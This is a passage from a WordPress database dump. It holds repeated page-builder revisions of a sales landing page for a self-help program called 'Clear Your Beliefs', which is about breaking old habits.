They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"7";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"1";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"9";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:10:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"3";}i:9;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:15:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:11;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"8";}i:12;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"8";}i:13;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}}}'),
(1518, 1968, 'panels_data', 'a:3:{s:7:"widgets";a:11:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:639:"<div class="quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"7";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"9";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:839:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></div><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:11:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"3";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:16:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"8";}i:12;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"8";}i:13;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1519, 1969, 'panels_data', 'a:3:{s:7:"widgets";a:11:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:639:"<div class="quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"7";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"9";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:11:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"3";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:16:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"8";}i:12;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"8";}i:13;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}}}'),
(1520, 1970, 'panels_data', 'a:3:{s:7:"widgets";a:11:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"7";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"9";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:11:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"3";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:16:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"8";}i:12;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"8";}i:13;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}}}'),
(1522, 1971, 'panels_data', 'a:3:{s:7:"widgets";a:13:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"7";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m 